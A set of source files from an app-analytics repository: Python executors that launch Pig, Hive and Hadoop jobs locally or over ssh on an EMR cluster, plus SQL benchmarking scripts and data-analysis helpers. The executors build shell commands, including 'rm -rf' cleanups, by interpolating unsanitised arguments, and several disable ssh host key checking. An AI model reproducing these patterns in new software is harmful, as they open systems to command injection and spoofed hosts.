'rm -rf %s' % settings.HDFS_MNT_PREFIX + f
)
elif "running_locally" in kwargs:
status, output = self.pre_del_local_data(f)
elif f.startswith('s3n'):
status, output = self.pre_del_s3_data(f)
else:
status, output = self.pre_del_hdfs_data(f)
if status != 0:
commands.getstatusoutput('rm -rf %s' % running_file)
return status, output
job_conf_params = ' '.join(['-D %s=%s' % (p[1:], v) for p, v in kwargs.iteritems() if p.startswith('D')])
if not self.t:
job_conf_params += ' -D hadoop.job.history.user.location=none'
params = ' '.join([
'-param %s=%s' % (p, v) for p, v in kwargs.iteritems() if not p.startswith('D')
]).replace('"', '\\"')
if self.t or "running_locally" in kwargs:
status, output = commands.getstatusoutput(
'cd %s;pig %s %s %s %s' % (pig_file_path, job_conf_params, mode_str, params, running_file)
)
else:
master_ip = self.get_master_ip(kwargs)
if not master_ip:
commands.getstatusoutput('rm -rf %s' % running_file)
return -1, 'No master_ip found'
dest_file = running_file[running_file.find('aardvark-analyze'):]
dest_path = dest_file.rsplit('/', 1)[0]
status, output = commands.getstatusoutput(
'scp -rqC -o StrictHostKeyChecking=no -i %s %s hadoop@%s:%s' % (
settings.EMR_KEY_PAIR_FILE, running_file, master_ip, dest_path + '/'
)
)
status, output = commands.getstatusoutput(
'ssh -o StrictHostKeyChecking=no hadoop@%s -i %s '
'--command "cd %s;~/pig/bin/pig %s %s %s %s"' % (
master_ip, settings.EMR_KEY_PAIR_FILE, dest_path,
mode_str, job_conf_params, params, '~/' + dest_file
)
)
if status != 0:
self.alert_on_fail(script_name=pig_file_name + '.pig')
commands.getstatusoutput('rm -rf %s' % running_file)
return status, output
class ShellExecutor(Executor):
"""
Shell executor
"""
def run(self, *args):
shell_file_path, shell_file_name = self._script_file_path.rsplit('/', 1)
shell_file_name = shell_file_name.replace('.sh', '')
running_path = os.path.join(shell_file_path, shell_file_name + '.sh')
params = ' '.join(['%s' % p for p in args])
status, output = commands.getstatusoutput(
'sh %s %s' % (running_path, params)
)
if status != 0:
self.alert_on_fail(script_name=shell_file_name + '.sh')
return status, output
class PythonExecutor(Executor):
"""
Python executor
"""
def run(self, *args, **kwargs):
params = ''
if args:
params = ' '.join(map(str, args))
if kwargs:
params += ' '
params += ' '.join(['--%s=%s' % (k, str(v)) for k, v in kwargs.iteritems()])
status, output = commands.getstatusoutput(
'python %s %s' % (self._script_file_path, params)
)
if status != 0:
self.alert_on_fail(script_name=self._script_file_path)
return status, output
class StreamingExecutor(Executor):
"""
Hadoop Streaming executor
"""
def replace_params(self, path, kwargs):
keys_to_remove = []
kwargs = sorted(kwargs.iteritems(), key=lambda asd: asd[0], reverse=True)
for k, v in kwargs:
if '$' + k in path:
path = path.replace('$' + k, str(v))
keys_to_remove.append(k)
return path, keys_to_remove
def run(self, *args, **kwargs):
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf import settings
streaming_file_path = self._script_file_path
mode_str = '-D hadoop.job.history.user.location=none'
if self.t or "running_locally" in kwargs:
kwargs['Dmapred.job.tracker'] = 'local'
mode_str = '-fs "file:///"'
input_schema = load_schema(kwargs.get('input'))
input_schema['table'] = STORE_STR_FUNC_MAPPING[input_schema['type']](input_schema, self.t)[1]
if self.t or "running_locally" in kwargs:
input_schema['table'] = input_schema['table'].replace('output_root_dir', 'input_root_dir')
input_schema['table'], input_keys_to_remove = self.replace_params(input_schema['table'], kwargs)
output_schema = load_schema(kwargs.get('output'))
output_schema['table'] = STORE_STR_FUNC_MAPPING[output_schema['type']](output_schema, self.t)[1]
output_schema['table'], output_keys_to_remove = self.replace_params(output_schema['table'], kwargs)
keys_to_remove = set(input_keys_to_remove + output_keys_to_remove)
        if self.t or "running_locally" in kwargs:
keys_to_remove.add('input_root_dir')
keys_to_remove.add('output_root_dir')
for k in keys_to_remove:
del kwargs[k]
running_locally = False
if "running_locally" in kwargs:
running_locally = True
del kwargs['running_locally']
if output_schema:
if self.t:
status, output = commands.getstatusoutput(
'rm -rf %s' % settings.HDFS_MNT_PREFIX + output_schema['table']
)
elif running_locally:
status, output = self.pre_del_local_data(output_schema['table'])
elif output_schema['table'].startswith('s3n'):
status, output = self.pre_del_s3_data(output_schema['table'])
else:
status, output = self.pre_del_hdfs_data(output_schema['table'])
if status != 0:
return status, output
if input_schema['table'] and input_schema['table'].startswith('s3n://') \
and not input_schema.get('need_credential'):
kwargs['input'] = 's3n://' + input_schema['table'].rsplit('@')[1]
else:
kwargs['input'] = input_schema['table'] or ''
if output_schema['table'] and output_schema['table'].startswith('s3n://') \
and not output_schema.get('need_credential'):
kwargs['output'] = 's3n://' + output_schema['table'].rsplit('@')[1]
else:
kwargs['output'] = output_schema['table'] or ''
job_conf_params = ' '.join(['-D %s=%s' % (p[1:], v) for p, v in kwargs.iteritems() if p.startswith('D')])
if 'libjars' in kwargs:
job_conf_params += ' -libjars %s' % kwargs['libjars']
del kwargs['libjars']
if 'files' in kwargs:
job_conf_params += ' -files %s' % kwargs['files']
del kwargs['files']
params = ' '.join([
'-%s %s' % (p, v) for p, v in kwargs.iteritems()
if not p.startswith('D') and p != 'cluster_application_type'
])
if self.t or running_locally:
cmd = 'cd %s;hadoop jar %s %s %s %s' % (
streaming_file_path, settings.STREAMING_JAR,
mode_str, job_conf_params, params
)
status, output = commands.getstatusoutput(cmd)
else:
master_ip = self.get_master_ip(kwargs)
if not master_ip:
return -1, 'No master_ip found'
dest_path = streaming_file_path[streaming_file_path.find('aardvark-analyze'):]
cmd = (
'ssh -o StrictHostKeyChecking=no hadoop@%s -i %s '
'--command "cd %s;hadoop jar %s %s %s %s"'
) % (
master_ip, settings.EMR_KEY_PAIR_FILE,
dest_path, settings.STREAMING_JAR, job_conf_params.replace('"', '\\"'),
mode_str, params.replace('"', '\\"')
)
status, output = commands.getstatusoutput(cmd)
if status != 0:
self.alert_on_fail(script_name=self._script_file_path)
return status, output
class HiveExecutor(Executor):
"""
Hive executor
"""
def run(self, *args, **kwargs):
sys.path.append(
os.path.join(os.path.split(os.path.realpath(__file__))[0], '..'))
from conf import settings
mode_str = ''
if self.t or "running_locally" in kwargs:
mode_str = '-hiveconf hive.exec.mode.local.auto=true'
hive_file_path, hive_file_name = self._script_file_path.rsplit('/', 1)
hive_file_name = hive_file_name.replace('.sql', '')
running_file, output_path_list = generate_hive_file(
hive_file_path, hive_file_name, kwargs, self.t
)
for f in output_path_list:
for p, v in kwargs.iteritems():
f = f.replace('$%s' % p, str(v))
if "running_locally" in kwargs:
self.pre_del_local_data('derby.log')
self.pre_del_local_data('metastore_db')
self.pre_del_local_data('TempStatsStore')
status, output = self.pre_del_local_data(f)
if status != 0:
commands.getstatusoutput('rm -rf %s' % running_file)
return status, output
job_conf_params = ' '.join([
'-hiveconf %s=%s' % (p[1:], v) for p, v in kwargs.iteritems()
if p.startswith('D')])
if not self.t:
job_conf_params += ' -hiveconf hadoop.job.history.user.location=none'
params = ' '.join([
'-hivevar %s=%s' % (p, v) for p, v in kwargs.iteritems()
if not p.startswith('D')
]).replace('"', '\\"')
if self.t or "running_locally" in kwargs:
status, output = commands.getstatusoutput(
'cd %s;hive %s %s %s -f %s -S' % (
hive_file_path, job_conf_params, mode_str, params,
running_file)
)
else:
master_ip = self.get_master_ip(kwargs)
if not master_ip:
commands.getstatusoutput('rm -rf %s' % running_file)
return -1, 'No master_ip found'
dest_file = running_file[running_file.find('aardvark-analyze'):]
dest_path = dest_file.rsplit('/', 1)[0]
status, output = commands.getstatusoutput(
'scp -rqC -i %s %s hadoop@%s:%s' % (
settings.EMR_KEY_PAIR_FILE, running_file, master_ip,
dest_path + '/'
)
)
status, output = commands.getstatusoutput(
                'ssh -o StrictHostKeyChecking=no hadoop@%s -i %s '
'--command "cd %s;~/hive/bin/hive %s %s %s -f %s -S"' % (
master_ip, settings.EMR_KEY_PAIR_FILE, dest_path,
mode_str, job_conf_params, params, '~/' + dest_file
)
)
for f in output_path_list:
if not f.startswith('s3n'):
continue
for p, v in kwargs.iteritems():
f = f.replace('$%s' % p, str(v))
self.del_s3_zero_file(f)
if status != 0:
self.alert_on_fail(script_name=hive_file_name + '.sql')
        commands.getstatusoutput('rm -rf %s' % running_file)
        return status, output
class LoopExecutor(Executor):
"""
    Loop executor
    """
    def __init__(self, *args, **kwargs):
        super(LoopExecutor, self).__init__(*args, **kwargs)
        # Instance attribute: a class-level list would be shared between instances.
        self._result = list()
def _extract_loop_kwargs(self, kwargs):
def _parse_loop(loop_content):
if not isinstance(loop_content, dict):
                raise Exception('Each loop circle should be a dict containing "arg", "generator", and "generator_params".')
if 'arg' not in loop_content:
raise Exception('No arg in loop circle.')
if 'generator' not in loop_content:
                raise Exception('No generator in loop circle.')
if 'generator_params' not in loop_content:
raise Exception('No generator_params in loop circle.')
loop_arg = loop_content.get('arg')
generator_content = loop_content.get('generator').rsplit('.', 2)
if len(generator_content) == 1:
module = 'loop_generators'
generator = generator_content[0]
elif len(generator_content) == 2:
module, generator = generator_content
elif len(generator_content) == 3:
_path, module, generator = generator_content
sys.path.append(os.path.join(os.path.split(os.path.realpath(__file__))[0],
'../../' + _path.replace('.', '/')))
else:
raise Exception(('Generator should be in format:[generator_path].[generator_module].[generator_class], '
'like workflow.module.loop_generators.TimeLoopGenerator.'))
loop_generator = getattr(import_module(module), generator)
try:
loop_generator = loop_generator(**loop_content.get('generator_params'))
except TypeError:
raise Exception('Necessary generator_params(s) for %s.__init__() are missing.' % generator)
_multiprocess_num = loop_content.get('multiprocess')
if _multiprocess_num:
try:
loop_multiprocess = int(_multiprocess_num)
if loop_multiprocess <= 1:
loop_multiprocess = 0
except ValueError:
loop_multiprocess = 0
else:
loop_multiprocess = 0
return (loop_arg, loop_generator, loop_multiprocess)
loop_kwargs = list()
_loop_content = kwargs.get('loop')
if isinstance(_loop_content, list):
for _each_loop in _loop_content:
loop_kwargs.append(_parse_loop(_each_loop))
elif isinstance(_loop_content, dict):
loop_kwargs.append(_parse_loop(_loop_content))
return loop_kwargs
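    # Example 'loop' kwargs accepted by the parser above (values are hypothetical):
    #   {'arg': 'date',
    #    'generator': 'TimeLoopGenerator',
    #    'generator_params': {'start': '2015-05-01', 'end': '2015-05-07'},
    #    'multiprocess': 4}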
def _execute(self, loop_list, loop_kwargs, args, raw_kwargs):
_loop_arg, _generator, _multiprocess = loop_list[0]
if len(loop_list) == 1:
_script_type = self._script_type.rsplit('.', 1)[1] # loop.pig / loop.hive
_executor = Executor.get_executor(_script_type)
_executor = _executor(self._script_file_path, self.t, self.alert_on_fail_flag)
if _multiprocess >= 2:
queue = copy.deepcopy(_generator)
pool = Pool(processes=_multiprocess)
for _loop_kwarg in queue:
kwargs = copy.deepcopy(loop_kwargs)
kwargs.update(_loop_kwarg)
kwargs.update(raw_kwargs)
pool.apply_async(_executor.run, args=args, kwds=kwargs, callback=self._collect_result)
pool.close()
pool.join()
else:
kwargs = copy.deepcopy(loop_kwargs)
for val in _generator.generate():
kwargs.update({_loop_arg: val})
kwargs.update(raw_kwargs)
self._collect_result(
_executor.run(*args, **kwargs), args, kwargs)
return
for val in _generator.generate(**loop_kwargs):
loop_kwargs.update({_loop_arg: val})
self._execute(loop_list[1:], loop_kwargs, args, raw_kwargs)
def _collect_result(self, result, args, kwargs):
status, output = result
if status != 0:
self._result.append('*' * 80)
self._result.append(
'Running error with args as "%s" and kwargs as "%s".'
% (str(args), str(kwargs)))
self._result.append(output)
def run(self, *args, **kwargs):
loop_kwargs = self._extract_loop_kwargs(kwargs)
if 'loop' in kwargs:
kwargs.pop('loop')
loop_multiprocess_kwargs = [kw for kw in loop_kwargs if kw[2] >= 2]
loop_all_kwargs = [kw for kw in loop_kwargs if kw[2] < 2 and kw[2] >= 0]
if loop_multiprocess_kwargs:
multiprocess_args = list()
for _arg in [arg.split(',') for arg, _, _ in loop_multiprocess_kwargs]:
multiprocess_args.extend(_arg)
multiprocess_num = reduce(lambda x, y: x * y, [num for _, _, num in loop_multiprocess_kwargs])
multiprocess_queue = list()
for item in itertools.product(*[generator.generate() for _, generator, _ in loop_multiprocess_kwargs]):
values = list()
for _val in item:
if isinstance(_val, tuple):
values.extend(_val)
else:
values.append(_val)
_kwargs = dict((key, val) for key, val in zip(multiprocess_args, values))
multiprocess_queue.append(_kwargs)
loop_all_kwargs.append((multiprocess_args, multiprocess_queue, multiprocess_num))
self._execute(loop_all_kwargs, {}, args, kwargs)
return (-1, '\n'.join(self._result)) if self._result else (0, 'Success')
<file_sep>/audience/legacy_experiments/get_app_gender_from_db_android.py
import argparse
import numpy as np
import psycopg2
def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('threshold', type=float,
                        help='max value to be considered male or female')
    args = parser.parse_args()
conn1=psycopg2.connect('dbname=aa_reviews user=aa host=10.38.48.144 port=5432')
cur1=conn1.cursor()
conn2=psycopg2.connect('dbname=aa_reviews user=aa host=10.38.48.144 port=5432')
cur2=conn2.cursor()
while True:
app_class = raw_input('Enter app class or q to quit: ')
if app_class == 'q':
break
sql = 'select n.p_male as reviewer, r.p_male as text, t.p_male as title, aar.id \
from reviewer_p n, review_p r, title_p t, aa_review aar \
where r.id = t.id \
and aar.reviewer = n.reviewer \
and aar.id = r.id \
and aar.date>=%s \
and aar.date<=%s'
params = (app_class,)
#print cur1.mogrify(sql, params)
cur1.execute(sql, params)
app_id = cur1.fetchone()
app_id = app_id[0]
sql = 'select p_male \
from review r, reviewer_gender g \
where r.reviewer=g.reviewer \
and r.language=g.language \
and g.p_male>=0 \
and r.app_id=%s \
and r.language=%s'
params = (app_id, 'en',)
#print cur2.mogrify(sql, params)
cur2.execute(sql, params)
p_male = cur2.fetchall()
p_male = [item for sublist in p_male for item in sublist]
p_male = np.array(p_male, dtype=np.dtype(float))
        print 'Before threshold: count=%s, mean=%s' % (len(p_male), np.mean(p_male))
        p_male = p_male[(p_male < args.threshold) | (p_male > (1.0 - args.threshold))]
#print p_male
        print 'After threshold: count=%s, mean=%s' % (len(p_male), np.mean(p_male))
p_male = np.around(p_male)
#print p_male
print 'mean=%s'%np.mean(p_male)
cur1.close()
conn1.close()
cur2.close()
conn2.close()
if __name__ == '__main__':
main()
<file_sep>/google-analytics/rincon_dump/compare_predict.sh
#! /bin/bash
if [ $# -eq 2 ]
then
file1=$1
file2=$2
echo "Comparing two files:"
echo $file1, $file2
else
echo 'Usage: compare_predict.sh <file1> <file2>'
exit 1
fi
sort -t ',' -k 1,4 "$file1" > sorted_1
sort -t ',' -k 1,4 "$file2" > sorted_2
vimdiff sorted_1 sorted_2
rm sorted_1 sorted_2
<file_sep>/evaluation/py/fetch_raw_est.py
"""
Fetch raw estimation through the script.
Arguments:
  -p The platform configuration to use.
"""
## Author: <NAME> <<EMAIL>>
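## Example invocation (sketch; only -p is documented above, the other flag
## names are assumed to match what internal.args.parse_options defines):
##   python fetch_raw_est.py -p android_weekly -s 10,3 -u Downloads \
##       -d 2013-01-01,2013-01-31 ./out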
from internal.args import parse_options
from internal.est_fetcher import *
def main():
opts, args = parse_options()
# Get the options.
stores = opts.stores
units_types = opts.units_types
daterange = opts.daterange
save_dir = args[0]
    est_type = opts.type  # renamed from `type` to avoid shadowing the builtin
    fetcher = globals()['%sEstFetcher' % _map_platform_to_class_name(opts.platform)]
    fetcher.fetch_to_dir(save_dir, stores, units_types, daterange, est_type)
def _map_platform_to_class_name(platform):
"""E.g. android_weekly -> AndroidWeekly
"""
return ''.join(map(str.capitalize, platform.split('_')))
if __name__ == '__main__':
main()
<file_sep>/int-vs-m-benchmark/create_table_statements_android.sql
/*
Create table statements for android specific tables:
- est_app_rank
- est_ranking
- sbe_est_app_unique
- sbe_est_app
*/
use aa_benchmarking_android;
DROP TABLE IF EXISTS est_app_rank;
DROP TABLE IF EXISTS est_ranking;
DROP TABLE IF EXISTS sbe_est_app_unique;
DROP TABLE IF EXISTS sbe_est_app;
CREATE TABLE est_app_rank (
app_id integer NOT NULL,
store_id integer NOT NULL,
category_id smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
free smallint NOT NULL,
paid smallint NOT NULL,
revenue smallint NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
app_id)
);
CREATE TABLE est_ranking (
store_id integer NOT NULL,
category_id smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
rank smallint NOT NULL,
free integer NOT NULL,
paid integer NOT NULL,
revenue integer NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
rank)
);
CREATE TABLE sbe_est_app_unique (
app_id integer NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
store_id integer NOT NULL,
free integer NOT NULL,
paid integer NOT NULL,
revenue integer NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
app_id)
);
CREATE TABLE sbe_est_app (
app_id integer NOT NULL,
store_id integer NOT NULL,
category_id smallint NOT NULL,
start_date date NOT NULL,
end_date date NOT NULL,
free integer NOT NULL,
paid integer NOT NULL,
revenue integer NOT NULL,
CONSTRAINT PRIMARY KEY (
start_date,
end_date,
store_id,
category_id,
app_id)
);
<file_sep>/int-vs-m-benchmark/sql/android/1001a5-initialize-settings_tables.sql
/*
DESCRIPTION : create working tables
INPUT TABLE(S) : market.countries,
market.applications,
market.currencies,
generic.exchange_rates,
generic.currencies,
market.appstore_instances,
market.rankcategories,
market.categories
INTERIM TABLE(S) : temp.countries_free_temp,
temp.countries_paid_temp,
temp.countries_gross_temp,
temp.day_weights_temp
OUTPUT TABLE(S) : temp.settings_countries
temp.settings_day_weights
temp.settings_excluded_apps
temp.settings_exchange_rates
temp.settings_appstore_instances
temp.settings_rankcategories
QUERY STEPS : 1. create temporary tables for countries, day weights, excluded apps, exchange rates,
appstore_instances, rankcategories
*/
-- The estimation date is the used for which the estimates are made. In
-- contrast to Apple Appstore, there is a gap of 1 day between the rankings
-- date and the last download date. This date is also used in the
-- *.new_estimation_market table.
SET @estimation_date = DATE_SUB(@date, INTERVAL 2 DAY);
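-- Worked example: with @date = '2015-05-10', estimates are made for
-- @estimation_date = '2015-05-08'.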
-- COUNTRIES FREE --
SET @countries_free = REPLACE(TRIM(REPLACE(REPLACE(UPPER(@countries_free),' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@countries_free,'temp.countries_free_temp','VARCHAR(6)');
-- COUNTRIES PAID --
SET @countries_paid = REPLACE(TRIM(REPLACE(REPLACE(UPPER(@countries_paid),' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@countries_paid,'temp.countries_paid_temp','VARCHAR(6)');
-- COUNTRIES GROSS --
SET @countries_gross = REPLACE(TRIM(REPLACE(REPLACE(UPPER(@countries_gross),' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@countries_gross,'temp.countries_gross_temp','VARCHAR(6)');
-- GENERAL COUNTRIES SETTINGS TABLE --
DROP TEMPORARY TABLE IF EXISTS temp.settings_countries;
CREATE TEMPORARY TABLE temp.settings_countries (
iso_code VARCHAR(2),
type ENUM('gross','paid','free') NOT NULL,
CONSTRAINT PRIMARY KEY (iso_code,type)
)
AS
SELECT 'free' AS type, f.element as iso_code FROM temp.countries_free_temp f
UNION
SELECT 'paid' AS type, p.element as iso_code FROM temp.countries_paid_temp p
UNION
SELECT 'gross' AS type, g.element as iso_code FROM temp.countries_gross_temp g
;
-- DOWNLOAD DAY WEIGHTS --
SET @day_weights = REPLACE(TRIM(REPLACE(REPLACE(@day_weights,' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@day_weights,'temp.day_weights_temp','DECIMAL(4,3)');
-- Note that the first day weighted is the day before the run date (@date) and
-- not the estimation date.
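-- Worked example (hypothetical weights): @day_weights = '0.5,0.3,0.2' assigns
-- 0.5 to the first weighted day and 0.3 and 0.2 to the two days before it.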
DROP TEMPORARY TABLE IF EXISTS temp.settings_day_weights;
CREATE TEMPORARY TABLE temp.settings_day_weights(
date date,
weight DECIMAL(4,3),
CONSTRAINT PRIMARY KEY (date)
) AS
SELECT
DATE(DATE_SUB(@date,INTERVAL id - 1 day)) as date,
element as weight
FROM
temp.day_weights_temp
WHERE
element > 0
;
-- EXCLUDED_APPLICATIONS --
-- DO MINIMAL WORK TO REMOVE THIS FOR "FAIR BENCHMARKING", MAKING IT EASY TO INTRODUCE THEM AGAIN IF NEEDED
SET @exclude_application_ids = REPLACE(TRIM(REPLACE(REPLACE(@exclude_application_ids,' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@exclude_application_ids,'temp.excluded_applications_temp','INT');
DROP TEMPORARY TABLE IF EXISTS temp.settings_excluded_apps;
CREATE TEMPORARY TABLE temp.settings_excluded_apps
(application_id INT unsigned NOT NULL PRIMARY KEY)
AS
SELECT a.id AS application_id
FROM market.applications a
JOIN temp.excluded_applications_temp t ON (t.element = a.id OR t.element = a.parent_id)
;
-- EXCLUDED_PREINSTALLED_APPLICATIONS --
SET @exclude_preinstalled_application_ids = REPLACE(TRIM(REPLACE(REPLACE(@exclude_preinstalled_application_ids,' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@exclude_preinstalled_application_ids,
'temp.excluded_preinstalls_temp','INT');
DROP TEMPORARY TABLE IF EXISTS temp.settings_excluded_preinstalled_apps;
CREATE TEMPORARY TABLE temp.settings_excluded_preinstalled_apps
(application_id INT unsigned NOT NULL PRIMARY KEY)
AS
SELECT
a.id AS application_id
FROM
market.applications a
JOIN temp.excluded_preinstalls_temp t
ON t.element = a.id
;
-- EXCHANGE RATES --
DROP TEMPORARY TABLE IF EXISTS temp.settings_exchange_rates;
CREATE TEMPORARY TABLE temp.settings_exchange_rates (
id smallint(11) unsigned,
rate decimal(12,6),
CONSTRAINT PRIMARY KEY (id)
) AS
SELECT
cr.id,
gc_foreign.code,
er.rate
FROM generic.exchange_rates er
JOIN generic.currencies gc_base ON gc_base.id = er.currency_id
JOIN generic.currencies gc_foreign ON gc_foreign.id = er.foreign_currency_id
JOIN market.currencies cr ON cr.code = gc_foreign.code
WHERE er.date = @estimation_date
AND gc_base.code = 'USD'
;
-- APPSTORE INSTANCES --
DROP TEMPORARY TABLE IF EXISTS temp.settings_appstore_instances;
CREATE TEMPORARY TABLE temp.settings_appstore_instances(
appstore_instance_id SMALLINT(5) UNSIGNED NOT NULL,
type ENUM('gross','paid','free') NOT NULL,
country_id smallint(5) unsigned NOT NULL,
CONSTRAINT PRIMARY KEY (appstore_instance_id,type)
)
AS
SELECT
ai.id AS appstore_instance_id,
ai.country_id,
t.type
FROM market.appstore_instances ai
JOIN market.countries cn ON cn.id = ai.country_id
JOIN temp.settings_countries t ON t.iso_code = cn.iso_code
WHERE ai.device_id IS NULL
;
-- TODO: consider restricting this to a subset of categories; many are obsolete.
-- RANKCATEGORIES RANKINGS --
DROP TEMPORARY TABLE IF EXISTS temp.settings_rankcategories;
CREATE TEMPORARY TABLE temp.settings_rankcategories(
`rankcategory_id` SMALLINT(5) UNSIGNED NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
`category_id` SMALLINT(5) UNSIGNED NOT NULL,
CONSTRAINT PRIMARY KEY (
rankcategory_id,
type)
)
AS
SELECT
rc.id AS rankcategory_id,
rc.type,
rc.category_id
FROM market.rankcategories rc
JOIN market.categories c ON c.id = rc.category_id
WHERE rc.type IN ('free','paid','gross');
-- LOW QUALITY COUNTRIES --
SET @low_quality_countries = REPLACE(TRIM(REPLACE(REPLACE(UPPER(@low_quality_countries),' ',''),',',' ')),' ',',');
CALL generic_string_list_to_table_$process_id(@low_quality_countries,'temp.low_quality_countries_temp','VARCHAR(6)');
DROP TEMPORARY TABLE IF EXISTS temp.settings_low_quality_countries;
CREATE TEMPORARY TABLE temp.settings_low_quality_countries (
iso_code VARCHAR(2),
country_id smallint(5) unsigned NOT NULL,
CONSTRAINT PRIMARY KEY (iso_code))
AS
SELECT
iso_code,cn.id as country_id
FROM
market.countries cn
JOIN temp.low_quality_countries_temp t
ON t.element = cn.iso_code
;
<file_sep>/int-vs-m-benchmark/sql/ios/1000d2-prepare_application_data-extract_data_from_rankings.sql
/*
FUNCTIONAL DESCRIPTION  : See if the price of an app changed, and whether apps are ranked only for iPhone/iPad or for both
DEPENDS ON TABLE(S) : temp.rankings_hourly, temp.rankings_daily, appstore.categories
RESULTS IN TABLE(S) : temp.ranking_application_data
PROCEDURE               : STEP 1. Gather rank information per device/category (only Top Overall and All Games, since we only have hourly ranks for those categories)/country, plus pricing information from hourly ranks
                                  Select the lowest rank per device as a lower bound for the criterion to include those apps as 'universal apps'
                          STEP 2. Check again whether the price has changed, this time without distinguishing categories
                          STEP 3. See if apps are ranked in both iPhone and iPad rankings as prep work for the universal fix
*/
-- STEP 1.
-- COMBINED RANKING DATA --
DROP TEMPORARY TABLE IF EXISTS temp.ranking_application_data_combined;
CREATE TEMPORARY TABLE temp.ranking_application_data_combined(
date date NOT NULL,
country_id smallint(5) unsigned NOT NULL,
`type` ENUM('free','paid','gross') NOT NULL,
application_id int(10) unsigned NOT NULL,
ranked_on_iphone smallint(5) DEFAULT NULL,
ranked_on_ipad smallint(5) DEFAULT NULL,
price_usd decimal(9,2) DEFAULT NULL,
price_changed TINYINT NOT NULL,
CONSTRAINT PRIMARY KEY (date, country_id, application_id, type)
)
SELECT
rd.date,
rd.country_id,
CAST(rd.type as CHAR(5)) as type,
rd.application_id,
MAX(IF(rd.device_id=1,1,0)) as ranked_on_iphone,
MAX(IF(rd.device_id=2,1,0)) as ranked_on_ipad,
    MAX(rd.price_usd) as max_price_usd,
    MIN(rd.price_usd) as min_price_usd,
    AVG(rd.price_usd) AS price_usd,  -- fills the declared price_usd column read in STEP 2 and STEP 3
IF(MAX(rd.price_usd)<>MIN(rd.price_usd),1,0) AS price_changed
FROM
temp.rankings rd
GROUP BY
rd.date, rd.country_id, rd.type, rd.application_id
;
-- STEP 2.
-- FINAL CROSS type PRICE CHANGE CHECK --
DROP TEMPORARY TABLE IF EXISTS temp.price_changes;
CREATE TEMPORARY TABLE temp.price_changes
(CONSTRAINT PRIMARY KEY (date, country_id, application_id))
AS
SELECT date, country_id, application_id,
IF(MAX(price_changed )= 1,
1,
IF(MIN(price_usd) <> MAX(price_usd),
1,
0)
) AS price_changed
FROM
temp.ranking_application_data_combined
GROUP BY
date,
country_id,
application_id
;
-- STEP 3.
-- FINAL UNIVERSAL CHECK --
DROP TEMPORARY TABLE IF EXISTS temp.ranking_application_data;
CREATE TEMPORARY TABLE temp.ranking_application_data(
date date NOT NULL,
device_id TINYINT not null,
country_id smallint(5) unsigned NOT NULL,
`type` ENUM('free','paid','gross') NOT NULL,
application_id int(10) unsigned NOT NULL,
ranked_on_iphone TINYINT NOT NULL,
ranked_on_ipad TINYINT NOT NULL,
price_usd decimal(9,2) DEFAULT NULL,
price_changed TINYINT NOT NULL,
CONSTRAINT PRIMARY KEY (date,device_id,country_id, type, application_id)
)
SELECT
r.date,
d.device_id,
r.country_id,
r.type,
r.application_id,
r.ranked_on_iphone,
r.ranked_on_ipad,
r.price_usd,
p.price_changed
FROM temp.ranking_application_data_combined r
JOIN temp.price_changes p ON p.date = r.date AND p.country_id = r.country_id AND p.application_id = r.application_id
JOIN (SELECT 1 as 'device_id' UNION SELECT 2 as 'device_id') as d
HAVING (device_id = 1 AND ranked_on_iphone = 1) OR (device_id = 2 AND ranked_on_ipad = 1)
;
<file_sep>/aa_au_model/audience/audience/plot.py
import os
import pandas as pd
from collections import OrderedDict
from matplotlib import pyplot as plt
from sklearn import metrics
from sklearn import preprocessing
def diff_traces(df, time_var, id_var, value_vars, n_traces=500, metric='pp', **kwargs):
"""
Plot traces for differences in estimates over time.
:param df: DataFrame with: date column, ID column, and one or multiple value columns
:param time_var: Column name containing time index
:param id_var: Column name that is used as ID
:param value_vars: Iterable with column name(s) of variable(s) to plot.
Every variable is given a separate subplot.
:param n_traces: # traces to plot
:param metric: Metric that is plotted.
:param **kwargs: Keyword arguments for plt.subplots()
Example:
- plot_diff_traces(device_estimates, 'date', 'device_id',
['13-24', '25-54', 55+], 10)
- plot_diff_traces(app_estimates, 'date', 'bundle_id',
['13-24', '25-54', 55+], 50, figsize=(10, 3))
"""
max_std = -1
    fig, ax = plt.subplots(len(value_vars), 1, squeeze=False, **kwargs)
    ax = ax.ravel()  # always a flat array of Axes, even for a single subplot
for ii, current_ax in enumerate(ax):
current_var = value_vars[ii]
# Pivot to get a matrix with time x id.
time_values = pd.pivot_table(df.reset_index(), values=current_var,
index=time_var, columns=id_var)
# Compute difference over time.
time_differences = time_values.diff().iloc[1:]
n_plot_traces = min(n_traces, time_values.shape[1])
# Plot sample of traces.
sampled_traces = time_differences.sample(n=n_plot_traces, axis=1)
sampled_traces.plot(style='-k', alpha=0.05, legend='', ax=current_ax)
# Population average with error bars.
pop = pd.concat([time_differences.mean(axis=1),
time_differences.std(axis=1)],
axis=1)
pop.columns = ['Average population diff', 'se']
pop.plot(y='Average population diff', yerr='se', ax=current_ax,
style='-o')
# Axes title with summary stats.
title_str = ("$ \Delta P ({}) $, overall WoW change: " +
"({:1.1f} $ \pm $ {:1.1f}) {} \t (# traces: {})")
diff_values = time_differences.values.flatten()
valid_diff = diff_values[pd.notnull(diff_values)]
title_stats = [current_var, valid_diff.mean(), valid_diff.std(),
metric, n_plot_traces]
# Format plot.
current_ax.set_title(title_str.format(*title_stats))
current_ax.set_ylabel('WoW change ({})'.format(metric))
lines, labels = current_ax.get_legend_handles_labels()
current_ax.legend([lines[-1][0]], [labels[-1]], loc='upper right')
max_std = max(max_std, valid_diff.std())
if ii != len(ax) - 1:
current_ax.set_xlabel('')
else:
current_ax.set_ylim((-max_std * 4, max_std * 4))
return fig, ax
def multiclass_roc_curve(df_true, df_score):
"""
